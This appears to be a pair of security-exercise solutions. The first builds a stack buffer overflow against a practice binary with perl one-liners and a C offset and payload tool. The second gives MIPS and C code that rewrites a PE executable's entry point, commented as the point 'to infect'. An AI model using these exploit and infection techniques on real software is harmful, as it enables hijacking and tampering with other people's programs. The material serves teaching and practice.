[Challenge 1 Solution]

Look up the address of the execme function:
    objdump -d execme
    Address = 08048404
    Little-endian(08048404) = \x04\x84\x04\x08

Find the offset to the saved EIP by trial (we assume it lies just past the buffer, and it does). We know the buffer is 64 bytes, so the trials start at 64 and grow the filler by one byte each time, always followed by the address of execme:
    perl -e 'print "X"x64 . "\x04\x84\x04\x08"' | ./stack
    perl -e 'print "X"x65 . "\x04\x84\x04\x08"' | ./stack
    .
    .
    .
    perl -e 'print "X"x76 . "\x04\x84\x04\x08"' | ./stack

After a few attempts it hits at 76: the saved return address is overwritten with the address of execme and the function runs.
    Input:  perl -e 'print "X"x76 . "\x04\x84\x04\x08"' | ./stack
    Output:
    Ejecutame :)
    Segmentation fault (core dumped)

The segmentation fault after the message is expected: execme was never called, only returned into, so when its own ret executes it pops the next word on the stack as a return address, and nothing valid is there.
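Added example, not part of the original paste: the trial loop above works because the saved EIP is close to the buffer, but the general technique is to send a cyclic pattern once, read the EIP value from the crash (gdb or the core dump) and look its 4 bytes up in the pattern. The tool below does that and then builds the same filler-plus-address input as the perl one-liner. The binary name stackpat is assumed; ./stack, the 64-byte buffer and the execme address 0x08048404 are the page's.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...Ab0...": every 4-byte window is
 * unique within the first 20280 bytes, so the 4 bytes that land in EIP identify
 * their position in the input without further trials. Writes up to `len`
 * bytes to `out` and returns how many were written. */
size_t pattern_create(char *out, size_t len)
{
    const char *U = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const char *L = "abcdefghijklmnopqrstuvwxyz";
    const char *D = "0123456789";
    size_t n = 0;
    for (int u = 0; u < 26 && n < len; u++)
        for (int l = 0; l < 26 && n < len; l++)
            for (int d = 0; d < 10 && n < len; d++) {
                const char trip[3] = { U[u], L[l], D[d] };
                for (int k = 0; k < 3 && n < len; k++)
                    out[n++] = trip[k];
            }
    return n;
}

/* Little-endian read of 4 bytes, the way a 32-bit x86 CPU loads the saved
 * return address from the stack into EIP. */
static uint32_t le32(const unsigned char *b)
{
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Given the EIP value reported for the crash, return the offset of those 4
 * bytes inside the pattern, or -1 if they are not in it (EIP was not
 * overwritten by our input). */
long pattern_offset(const char *pat, size_t len, uint32_t eip)
{
    for (size_t i = 0; i + 4 <= len; i++)
        if (le32((const unsigned char *)pat + i) == eip)
            return (long)i;
    return -1;
}

/* Build the final input: `offset` filler bytes followed by `target` in
 * little-endian order. With offset 76 and target 0x08048404 this is exactly
 * perl -e 'print "X"x76 . "\x04\x84\x04\x08"'. */
size_t build_payload(unsigned char *out, size_t offset, uint32_t target)
{
    memset(out, 'X', offset);
    for (int k = 0; k < 4; k++)
        out[offset + k] = (unsigned char)(target >> (8 * k));
    return offset + 4;
}

int main(int argc, char *argv[])
{
    static char pat[512];                 /* plenty for a 64-byte buffer */
    static unsigned char payload[512 + 4];
    size_t n = pattern_create(pat, sizeof pat);

    if (argc == 2 && strcmp(argv[1], "pattern") == 0) {
        /* step 1: ./stackpat pattern | ./stack, then read EIP from the crash */
        fwrite(pat, 1, n, stdout);
    } else if (argc == 3 && strcmp(argv[1], "offset") == 0) {
        /* step 2: ./stackpat offset 0x63413563  -> prints 76 */
        printf("%ld\n", pattern_offset(pat, n, (uint32_t)strtoul(argv[2], NULL, 16)));
    } else if (argc == 4 && strcmp(argv[1], "payload") == 0) {
        /* step 3: ./stackpat payload 76 0x08048404 | ./stack */
        size_t off = strtoul(argv[2], NULL, 10);
        if (off > sizeof pat) return 1;
        size_t m = build_payload(payload, off, (uint32_t)strtoul(argv[3], NULL, 16));
        fwrite(payload, 1, m, stdout);
    } else {
        fprintf(stderr, "usage: %s pattern | offset <hex eip> | payload <offset> <hex addr>\n", argv[0]);
        return 2;
    }
    return 0;
}
```

The offset lookup compares little-endian windows because that is how the CPU read the bytes; feeding it the raw ASCII seen in a hex dump instead of the EIP value would give the wrong position.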
[Challenge 2 Solution]
---------------------------------------------------------
MIPS R2000 (32BIT):
---------------------------------------------------------
        .data   0x10000000
path:   .asciiz "test.exe"
        ## inftest.exe must already exist ##
pathi:  .asciiz "inftest.exe"
        ## Upper bound on the file size; read/write never exceed it ##
buffer: .space  600000

        .globl  __start
        .text   0x00400000
__start:
        ## Open file for reading (flag 0) ##
        la      $a0, path
        li      $a1, 0
        jal     _openFile
        ## Read the file into buffer; $s7 = bytes actually read ##
        jal     _readFile
        ## Change the entry point ##
        jal     _change
        ## Close the exe ##
        jal     _close
        ## Open file for writing (flag 1) ##
        la      $a0, pathi
        li      $a1, 1
        jal     _openFile
        ## Write the patched exe back ##
        jal     _write
        ## Close the exe ##
        jal     _close
        ## Print test ##
        #jal    _print
        ## Exit ##
        li      $v0, 10
        syscall

## write($s6, buffer, $s7): only the bytes that were read, not the whole
## 600000-byte buffer, otherwise the output file is padded with zeros ##
_write: li      $v0, 15
        move    $a0, $s6
        la      $a1, buffer
        move    $a2, $s7
        syscall
        jr      $ra

## Patch AddressOfEntryPoint at file offset 0xA8. The field sits at
## e_lfanew + 0x28, so 0xA8 assumes e_lfanew (the u32 at offset 0x3C) is 0x80 ##
_change:
        la      $a0, buffer
        addiu   $a0, $a0, 0x0A8         # EP offset
        ## Overwrite the 1st (lowest) byte of the EP address ##
        li      $a1, 0x3c
        sb      $a1, 0($a0)
        ## The other 3 bytes of the 32-bit address can be modified by chaining
        ## the same li/sb pair at 1($a0), 2($a0) and 3($a0) ##
        jr      $ra

## open(path=$a0, flags=$a1, mode=0); descriptor saved in $s6 ##
_openFile:
        li      $v0, 13
        li      $a2, 0
        syscall
        move    $s6, $v0                # Save descriptor
        jr      $ra

## read($s6, buffer, 600000); number of bytes read saved in $s7 ##
_readFile:
        li      $v0, 14
        move    $a0, $s6                # $a0 -> descriptor
        la      $a1, buffer
        li      $a2, 600000
        syscall
        move    $s7, $v0                # Save bytes read
        jr      $ra

## close($s6) ##
_close: li      $v0, 16
        move    $a0, $s6
        syscall
        jr      $ra

## Print the bytes read, one character at a time (syscall 11) ##
_print: move    $t0, $s7
        beq     $t0, $zero, pdone       # nothing read, nothing to print
        li      $v0, 11
        la      $t1, buffer
loop:   lb      $a0, 0($t1)
        syscall
        addiu   $t0, $t0, -1
        addiu   $t1, $t1, 1
        bne     $t0, $zero, loop
pdone:  jr      $ra
---------------------------------------------------------
C (LINUX)
---------------------------------------------------------
#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>

// Map the file into memory, move a byte pointer from the start of the mapping
// to offset 0x0A8, where the 4-byte AddressOfEntryPoint field lives, read it
// and overwrite it. 0xA8 only holds when e_lfanew (the u32 at file offset
// 0x3C) is 0x80: the field is always at e_lfanew + 0x28.
int main(int argc, char *argv[])
{
    char *p, *org;
    uint32_t *t;
    int fd;
    struct stat bstat;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <pe-file>\n", argv[0]);
        return 1;
    }
    fd = open(argv[1], O_RDWR);
    if (fd < 0) { perror("open"); return 1; }
    if (fstat(fd, &bstat) < 0) { perror("fstat"); close(fd); return 1; } // file size in bstat.st_size
    if (bstat.st_size < 0x0A8 + 4) {     // the field must lie inside the file
        fprintf(stderr, "file too small\n");
        close(fd);
        return 1;
    }
    org = mmap(NULL, bstat.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); // map the whole file
    if (org == MAP_FAILED) { perror("mmap"); close(fd); return 1; }
    p = org;
    p += 0x0A8;                          // Offset to AddressOfEntryPoint
    t = (uint32_t *)p;                   // Cast pointer to read 4 bytes
    printf("Current EP: 0x%08x\n", *t);  // Current EP (hex)
    *t = 0x1337;                         // EP to infect; MAP_SHARED writes go back to the file
    munmap(org, bstat.st_size);          // Unmap, flushing the change
    close(fd);
    return 0;
}
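Added example covering both the MIPS and the C listing above; it is not the paste's code. Both listings hard-code the entry point field at 0xA8, which is only right when the PE header starts at 0x80. The code below locates the field from e_lfanew, refuses input that is not a PE or whose headers do not fit in the buffer, and patches either an in-memory image or a file through mmap as the C listing does. The sample headers are constructed inline for the demonstration; the file mode and the program name pe_ep are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/mman.h>

/* PE headers are little-endian regardless of host; go through bytes. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint8_t *p, uint32_t v)
{
    for (int k = 0; k < 4; k++) p[k] = (uint8_t)(v >> (8 * k));
}

/* File offset of IMAGE_OPTIONAL_HEADER.AddressOfEntryPoint:
 *   "MZ" at 0, e_lfanew (u32) at 0x3C, "PE\0\0" at e_lfanew, then the 20-byte
 *   IMAGE_FILE_HEADER, then the optional header, whose AddressOfEntryPoint is
 *   at +0x10  =>  e_lfanew + 4 + 20 + 0x10 = e_lfanew + 0x28.
 * The page's 0xA8 is the special case e_lfanew == 0x80. Returns 0 and sets
 * *off, or -1 if this is not a PE or the headers would run past len. */
int pe_entry_point_offset(const uint8_t *img, size_t len, size_t *off)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z')
        return -1;
    uint32_t e_lfanew = rd32(img + 0x3C);
    if ((uint64_t)e_lfanew + 0x2C > len)              /* whole field must fit */
        return -1;
    if (memcmp(img + e_lfanew, "PE\0\0", 4) != 0)
        return -1;
    uint16_t size_opt = rd16(img + e_lfanew + 0x14);  /* SizeOfOptionalHeader */
    uint16_t magic    = rd16(img + e_lfanew + 0x18);  /* 0x10b PE32, 0x20b PE32+ */
    if (size_opt < 0x14 || (magic != 0x10b && magic != 0x20b))
        return -1;
    *off = (size_t)e_lfanew + 0x28;
    return 0;
}

/* Replace the entry point of an in-memory image; previous value via *old. */
int pe_set_entry_point(uint8_t *img, size_t len, uint32_t new_ep, uint32_t *old)
{
    size_t off;
    if (pe_entry_point_offset(img, len, &off) != 0)
        return -1;
    *old = rd32(img + off);
    wr32(img + off, new_ep);
    return 0;
}

/* Constructed sample: just the header bytes the parser needs, zero elsewhere.
 * Not a runnable executable, only enough to exercise the patcher. */
void make_sample_pe(uint8_t *buf, size_t len, uint32_t e_lfanew, uint32_t ep)
{
    memset(buf, 0, len);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, e_lfanew);
    memcpy(buf + e_lfanew, "PE\0\0", 4);
    buf[e_lfanew + 0x14] = 0xE0;                              /* SizeOfOptionalHeader */
    buf[e_lfanew + 0x18] = 0x0B; buf[e_lfanew + 0x19] = 0x01; /* magic 0x10b */
    wr32(buf + e_lfanew + 0x28, ep);
}

/* Same operation on a real file through mmap, as in the C listing, but with
 * the field located via e_lfanew and malformed input rejected. */
int pe_patch_file(const char *path, uint32_t new_ep, uint32_t *old)
{
    int fd = open(path, O_RDWR);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size <= 0) { close(fd); return -1; }
    uint8_t *img = mmap(NULL, (size_t)st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (img == MAP_FAILED) { close(fd); return -1; }
    int rc = pe_set_entry_point(img, (size_t)st.st_size, new_ep, old);
    munmap(img, (size_t)st.st_size);
    close(fd);
    return rc;
}

int main(int argc, char *argv[])
{
    uint8_t img[0x200];
    uint32_t old;
    size_t off;
    if (argc == 3) {                                  /* ./pe_ep <file> <hex new ep> */
        if (pe_patch_file(argv[1], (uint32_t)strtoul(argv[2], NULL, 16), &old) != 0) {
            fprintf(stderr, "not a PE or headers truncated\n");
            return 1;
        }
        printf("entry point 0x%08x -> %s\n", old, argv[2]);
        return 0;
    }
    /* e_lfanew = 0x80 reproduces the page's offset 0xA8; a longer DOS stub
     * (e_lfanew = 0xF8) moves the field, and a hard-coded 0xA8 would then
     * corrupt 4 bytes of the stub instead of the entry point. */
    make_sample_pe(img, sizeof img, 0x80, 0x1000);
    pe_entry_point_offset(img, sizeof img, &off);
    printf("e_lfanew 0x80: AddressOfEntryPoint at file offset 0x%zx\n", off);
    make_sample_pe(img, sizeof img, 0xF8, 0x2000);
    pe_entry_point_offset(img, sizeof img, &off);
    printf("e_lfanew 0xF8: AddressOfEntryPoint at file offset 0x%zx\n", off);
    pe_set_entry_point(img, sizeof img, 0x1337, &old);
    printf("patched 0x%08x -> 0x%08x\n", old, rd32(img + off));
    return 0;
}
```

The length check before dereferencing e_lfanew matters as much as the signature check: a crafted e_lfanew in an otherwise tiny file would otherwise turn the patcher into an out-of-bounds write through the mapping.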